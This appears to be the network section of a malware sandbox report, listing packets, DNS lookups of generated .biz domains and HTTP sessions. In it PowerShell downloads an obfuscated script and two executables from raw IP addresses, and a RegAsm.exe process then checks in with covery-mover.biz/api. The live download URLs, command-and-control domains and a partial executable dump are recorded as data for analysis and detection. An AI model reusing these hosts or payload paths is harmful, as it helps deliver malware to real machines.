Dec 12, 2024 07:52:16.057337046 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:16.060179949 CET  49738        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:16.060203075 CET  49738        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:16.060267925 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:16.781559944 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:16.781594038 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:16.781685114 CET  49738        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:16.781780005 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:16.782320976 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:16.782541990 CET  49738        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:16.782561064 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:16.784106016 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:16.784136057 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:16.784197092 CET  49738        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:16.784214020 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:16.784270048 CET  49738        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:16.784291983 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:16.800919056 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:16.801168919 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:16.801244020 CET  49738        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:16.801290035 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:16.801356077 CET  49738        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:16.901547909 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:16.947074890 CET  49738        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:16.973568916 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:16.973690987 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:16.973767042 CET  49738        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:16.973815918 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:16.977266073 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:16.977368116 CET  49738        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:16.977591991 CET  49738        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:16.977634907 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:16.977663040 CET  49738        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:16.977678061 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:17.015074015 CET  49739        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:17.015150070 CET  443          49739      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:17.015254974 CET  49739        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:17.015686035 CET  49739        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:17.015702009 CET  443          49739      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:18.227056980 CET  443          49739      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:18.227210045 CET  49739        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:18.228873968 CET  49739        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:18.228903055 CET  443          49739      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:18.229156971 CET  443          49739      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:18.230436087 CET  49739        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:18.230667114 CET  49739        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:18.230703115 CET  443          49739      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:18.230770111 CET  49739        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:18.230779886 CET  443          49739      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:19.083642006 CET  443          49739      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:19.083719015 CET  443          49739      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:19.083775997 CET  49739        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:19.096864939 CET  49739        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:19.096909046 CET  443          49739      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:19.134294033 CET  49740        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:19.134417057 CET  443          49740      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:19.134577036 CET  49740        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:19.135267973 CET  49740        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:19.135304928 CET  443          49740      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:20.349410057 CET  443          49740      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:20.349759102 CET  49740        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:20.440192938 CET  49740        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:20.440247059 CET  443          49740      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:20.440618038 CET  443          49740      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:20.444058895 CET  49740        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:20.444250107 CET  49740        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:20.444277048 CET  443          49740      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:21.115518093 CET  443          49740      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:21.115633965 CET  443          49740      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:21.115833998 CET  49740        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:21.115907907 CET  49740        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:21.202640057 CET  49742        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:21.202707052 CET  443          49742      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:21.202801943 CET  49742        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:21.203371048 CET  49742        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:21.203401089 CET  443          49742      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:22.415234089 CET  443          49742      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:22.415355921 CET  49742        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:22.417685986 CET  49742        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:22.417720079 CET  443          49742      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:22.417989969 CET  443          49742      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:22.425060987 CET  49742        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:22.425251961 CET  49742        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:22.425291061 CET  443          49742      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:22.425379038 CET  49742        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:22.425391912 CET  443          49742      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:23.819184065 CET  443          49742      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:23.819305897 CET  443          49742      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:23.819401979 CET  49742        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:23.941715002 CET  49742        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:23.941792965 CET  443          49742      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:24.400764942 CET  49746        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:24.400827885 CET  443          49746      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:24.400901079 CET  49746        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:24.401420116 CET  49746        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:24.401437998 CET  443          49746      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:25.613548040 CET  443          49746      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:25.613616943 CET  49746        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:25.615461111 CET  49746        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:25.615469933 CET  443          49746      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:25.615814924 CET  443          49746      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:25.623852968 CET  49746        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:25.623945951 CET  49746        443        192.168.2.4    172.67.206.64
                                                                        Dec 12, 2024 07:52:25.623953104 CET44349746172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:26.336821079 CET44349746172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:26.336952925 CET44349746172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:26.337004900 CET49746443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:26.340193987 CET49746443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:26.340209007 CET44349746172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:27.366624117 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:27.366688013 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:27.366770029 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:27.367108107 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:27.367127895 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.578915119 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.579229116 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.580606937 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.580637932 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.580914021 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.591631889 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.592534065 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.592588902 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.592719078 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.592772961 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.592922926 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.592961073 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.594736099 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.594794989 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.598793030 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.598855972 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.602992058 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.603044987 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.603071928 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.603102922 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.603342056 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.603382111 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.603430033 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.606805086 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.606865883 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.647342920 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.650947094 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.651022911 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.651065111 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.651099920 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.651127100 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.651143074 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:28.651257038 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:28.651278019 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:32.230478048 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:32.230561018 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:32.230632067 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:32.230818987 CET49748443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:32.230863094 CET44349748172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:32.236382008 CET49750443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:32.236433983 CET44349750172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:32.236536026 CET49750443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:32.236836910 CET49750443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:32.236871004 CET44349750172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:33.452126980 CET44349750172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:33.452235937 CET49750443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:33.453651905 CET49750443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:33.453681946 CET44349750172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:33.454284906 CET44349750172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:33.463505983 CET49750443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:33.463550091 CET49750443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:33.463699102 CET44349750172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:34.269310951 CET44349750172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:34.269610882 CET44349750172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:34.269845963 CET49750443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:34.269891024 CET49750443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:34.269910097 CET44349750172.67.206.64192.168.2.4
                                                                        Dec 12, 2024 07:52:34.269927979 CET49750443192.168.2.4172.67.206.64
                                                                        Dec 12, 2024 07:52:34.269936085 CET44349750172.67.206.64192.168.2.4
Timestamp                           | Source Port | Dest Port | Source IP   | Dest IP
Dec 12, 2024 07:52:10.958688974 CET | 54123       | 53        | 192.168.2.4 | 1.1.1.1
Dec 12, 2024 07:52:11.187233925 CET | 53          | 54123     | 1.1.1.1     | 192.168.2.4
Dec 12, 2024 07:52:11.188817024 CET | 65361       | 53        | 192.168.2.4 | 1.1.1.1
Dec 12, 2024 07:52:11.418251038 CET | 53          | 65361     | 1.1.1.1     | 192.168.2.4
Dec 12, 2024 07:52:11.432885885 CET | 58836       | 53        | 192.168.2.4 | 1.1.1.1
Dec 12, 2024 07:52:11.656316996 CET | 53          | 58836     | 1.1.1.1     | 192.168.2.4
Dec 12, 2024 07:52:11.676414967 CET | 60620       | 53        | 192.168.2.4 | 1.1.1.1
Dec 12, 2024 07:52:11.897440910 CET | 53          | 60620     | 1.1.1.1     | 192.168.2.4
Dec 12, 2024 07:52:11.967952967 CET | 58954       | 53        | 192.168.2.4 | 1.1.1.1
Dec 12, 2024 07:52:12.295221090 CET | 53          | 58954     | 1.1.1.1     | 192.168.2.4
Timestamp                           | Source IP   | Dest IP | Trans ID | OP Code            | Name              | Type           | Class       | DNS over HTTPS
Dec 12, 2024 07:52:10.958688974 CET | 192.168.2.4 | 1.1.1.1 | 0x51ae   | Standard query (0) | zinc-sneark.biz   | A (IP address) | IN (0x0001) | false
Dec 12, 2024 07:52:11.188817024 CET | 192.168.2.4 | 1.1.1.1 | 0x655a   | Standard query (0) | se-blurry.biz     | A (IP address) | IN (0x0001) | false
Dec 12, 2024 07:52:11.432885885 CET | 192.168.2.4 | 1.1.1.1 | 0xd2f1   | Standard query (0) | dwell-exclaim.biz | A (IP address) | IN (0x0001) | false
Dec 12, 2024 07:52:11.676414967 CET | 192.168.2.4 | 1.1.1.1 | 0xb777   | Standard query (0) | formy-spill.biz   | A (IP address) | IN (0x0001) | false
Dec 12, 2024 07:52:11.967952967 CET | 192.168.2.4 | 1.1.1.1 | 0xe0f2   | Standard query (0) | covery-mover.biz  | A (IP address) | IN (0x0001) | false
Timestamp                           | Source IP | Dest IP     | Trans ID | Reply Code     | Name              | CName | Address       | Type           | Class       | DNS over HTTPS
Dec 12, 2024 07:52:11.187233925 CET | 1.1.1.1   | 192.168.2.4 | 0x51ae   | Name error (3) | zinc-sneark.biz   | none  | none          | A (IP address) | IN (0x0001) | false
Dec 12, 2024 07:52:11.418251038 CET | 1.1.1.1   | 192.168.2.4 | 0x655a   | Name error (3) | se-blurry.biz     | none  | none          | A (IP address) | IN (0x0001) | false
Dec 12, 2024 07:52:11.656316996 CET | 1.1.1.1   | 192.168.2.4 | 0xd2f1   | Name error (3) | dwell-exclaim.biz | none  | none          | A (IP address) | IN (0x0001) | false
Dec 12, 2024 07:52:11.897440910 CET | 1.1.1.1   | 192.168.2.4 | 0xb777   | Name error (3) | formy-spill.biz   | none  | none          | A (IP address) | IN (0x0001) | false
Dec 12, 2024 07:52:12.295221090 CET | 1.1.1.1   | 192.168.2.4 | 0xe0f2   | No error (0)   | covery-mover.biz  | none  | 172.67.206.64 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 07:52:12.295221090 CET | 1.1.1.1   | 192.168.2.4 | 0xe0f2   | No error (0)   | covery-mover.biz  | none  | 104.21.58.186 | A (IP address) | IN (0x0001) | false
                                                                        • covery-mover.biz
                                                                        • 45.131.135.227
                                                                        • 147.45.44.131
Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
0          | 192.168.2.4 | 49732       | 45.131.135.227 | 80               | 3616 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp                           | Bytes transferred | Direction | Data
Dec 12, 2024 07:52:04.226413965 CET | 167               | OUT       | GET /tbhy.ps1 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: 45.131.135.227
                                                                        Connection: Keep-Alive
Dec 12, 2024 07:52:05.471096992 CET | 1236              | IN        | HTTP/1.1 200 OK
                                                                        Server: nginx/1.22.1
                                                                        Date: Thu, 12 Dec 2024 06:52:05 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 2386
                                                                        Last-Modified: Tue, 10 Dec 2024 20:48:17 GMT
                                                                        Connection: keep-alive
                                                                        ETag: "6758a911-952"
                                                                        Accept-Ranges: bytes
Data Ascii: $wB6aox = '4Z4X9bGMlZJpQoodMCZp/ZlcRarHBEr/e+AqgT07DjE='$c3pISr = 'cZAo3lxXmYLsG3mECNawJw=='$IpqPGA = '


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
1          | 192.168.2.4 | 49734       | 147.45.44.131  | 80               | 3616 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp                           | Bytes transferred | Direction | Data
Dec 12, 2024 07:52:06.541960001 CET | 180               | OUT       | GET /infopage/bhg8.exe HTTP/1.1
                                                                        X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                        Host: 147.45.44.131
                                                                        Connection: Keep-Alive
Dec 12, 2024 07:52:07.811290026 CET | 1236              | IN        | HTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 06:52:07 GMT
                                                                        Server: Apache/2.4.52 (Ubuntu)
                                                                        Last-Modified: Tue, 10 Dec 2024 18:23:51 GMT
                                                                        ETag: "b200-628ee95401970"
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 45568
                                                                        Keep-Alive: timeout=5, max=100
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-msdos-program
Dec 12, 2024 07:52:08.304292917 CET | 156               | OUT       | GET /infopage/ung0.exe HTTP/1.1
                                                                        X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                        Host: 147.45.44.131
Dec 12, 2024 07:52:08.708161116 CET | 1236              | IN        | HTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 06:52:08 GMT
                                                                        Server: Apache/2.4.52 (Ubuntu)
                                                                        Last-Modified: Tue, 10 Dec 2024 18:22:16 GMT
                                                                        ETag: "48e00-628ee8f9c1375"
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 298496
                                                                        Content-Type: application/x-msdos-program
                                                                        Dec 12, 2024 07:52:09.833314896 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 06:52:08 GMT
                                                                        Server: Apache/2.4.52 (Ubuntu)
                                                                        Last-Modified: Tue, 10 Dec 2024 18:22:16 GMT
                                                                        ETag: "48e00-628ee8f9c1375"
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 298496
                                                                        Content-Type: application/x-msdos-program
                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 ae 00 00 00 00 00 00 f0 87 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e1 0b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 78 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 0d [TRUNCATED]
                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELUg@p@0x9,.text `.rdata "@@.data P@.CRT R@@.relocx90:T@B


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        0 | 192.168.2.4 | 49737 | 172.67.206.64 | 443 | 7184 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-12-12 06:52:13 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 8
                                                                        Host: covery-mover.biz
                                                                        2024-12-12 06:52:13 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                        Data Ascii: act=life
                                                                        2024-12-12 06:52:14 UTC | 1017 | IN | HTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 06:52:14 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=06sp25c8rb0mhdj5rselmb3t6t; expires=Mon, 07-Apr-2025 00:38:53 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ExCCknO%2BqxLEfZ9ksj6AzRoww%2FX1eND%2FWkY0A2foTW2qwA3toDSgpKRvh4hm1goI2O%2Fi%2F27VuI9HOTxcS8pV4tV4gmG7WE8o%2BIDCWPYpEgKLiydWvb%2BQ18w5Ssu03in6wIsF"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f0bca5a4c086a5e-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1617&rtt_var=657&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=907&delivery_rate=1805813&cwnd=186&unsent_bytes=0&cid=b1cbfa9ca541f34c&ts=740&x=0"
                                                                        2024-12-12 06:52:14 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                        Data Ascii: 2ok
                                                                        2024-12-12 06:52:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        1 | 192.168.2.4 | 49738 | 172.67.206.64 | 443 | 7184 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-12-12 06:52:16 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 47
                                                                        Host: covery-mover.biz
                                                                        2024-12-12 06:52:16 UTC | 47 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 55 6b 67 4c 76 2d 2d 6f 74 64 65 6c 26 6a 3d
                                                                        Data Ascii: act=recive_message&ver=4.0&lid=DUkgLv--otdel&j=
                                                                        2024-12-12 06:52:16 UTC | 1009 | IN | HTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 06:52:16 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=lq4pudm5g35vmhkrhduk3r95cc; expires=Mon, 07-Apr-2025 00:38:55 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aLOhFWEqfP8owfBahHDV3A6pdOmSsps88gHmuxB9SOW3UoCblDXr8ZOB6XfOf%2Fzy8BxfSEjy4VVpI%2BycPwPro5mTk16qclja7HR5aU%2B09ZxmAQJp3X7UmxHMw3h6YLG5MnhJ"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f0bca6a199003d5-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1822&min_rtt=1818&rtt_var=685&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=947&delivery_rate=1606160&cwnd=226&unsent_bytes=0&cid=c04acdc08527c6f1&ts=733&x=0"
